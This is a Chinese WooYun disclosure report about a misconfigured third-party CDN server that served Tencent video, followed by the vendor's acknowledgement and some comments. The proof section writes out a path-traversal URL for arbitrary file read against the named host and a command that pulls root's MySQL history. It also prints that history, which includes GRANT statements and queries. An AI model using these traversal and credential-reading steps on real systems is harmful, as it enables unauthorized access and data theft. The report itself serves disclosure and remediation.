当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099916

漏洞标题:腾讯某站配置不当可导致部分地区腾讯视频播放源损坏

相关厂商:腾讯

漏洞作者: 杀器王子

提交时间:2015-03-06 18:38

修复时间:2015-04-20 18:40

公开时间:2015-04-20 18:40

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-06: 细节已通知厂商并且等待厂商处理中
2015-03-06: 厂商已经确认,细节仅向厂商公开
2015-03-16: 细节向核心白帽子及相关领域专家公开
2015-03-26: 细节向普通白帽子公开
2015-04-05: 细节向实习白帽子公开
2015-04-20: 细节向公众公开

简要描述:

腾讯某站配置不当可导致部分地区腾讯视频播放源损坏

详细说明:

http://transport.dnion.com/index.zul
这个站是腾讯使用的dnion cdn服务 主要用来做视频cdn分发和直播rtmp流分发
具体负责的地区不明确。

1.jpg


由于服务配置不当 导致任意文件读取 root权限

Snip20150306_80.png


读取history找到大量配置文件

漏洞证明:

Snip20150306_81.png


/var/local/apache-tomcat-6.0.35/logs/tencent-info.log
这是分发日志

Snip20150306_82.png


读web.xml找到数据库 并成功外连

Snip20150306_83.png


800多万视频来源地址

Snip20150306_84.png


Snip20150306_86.png


源码可下载 分发接口泄露 可以恶意分发
http://transport.dnion.com:1863/../../../../../../../var/local/apache-tomcat-twodb/webapps/videoTransPort2.01_online_1.0.tar.gz
本机3306开放 可以mysql外连

perl curl.pl transport.dnion.com:1863 /root/.mysql_history
show databases
;
GRANT ALL PRIVILEGES ON ^' WITH GRANT OPTION;
GRANT ALL PRIVILEGES ON *1" IDENTIFIED BY 'TH GRANT OPTION;
q
;
show databasesl
show databases;
use qqlive
ll
;
show tables;
select * from live_cache;
show processlist;
\q


history可以读到密码 可成功连接

修复方案:

版权声明:转载请注明来源 杀器王子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-03-06 20:00

厂商回复:

非常感谢您的报告,这个是租用的外部合作伙伴的cdn服务器,已经联系该第三方合作伙伴已着手处理,感谢杀气王子对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-06 20:27 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    竟然不是机器自动回复了。

  2. 2015-03-24 21:44 | zhxs ( 实习白帽子 | Rank:32 漏洞数:19 | Jyhack-TeaM:http://bbs.jyhack.com/)

    有杀气

  3. 2015-04-20 18:56 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @px1624 杀气太重,怕职位保不重啊,打了鸡血,活了。。。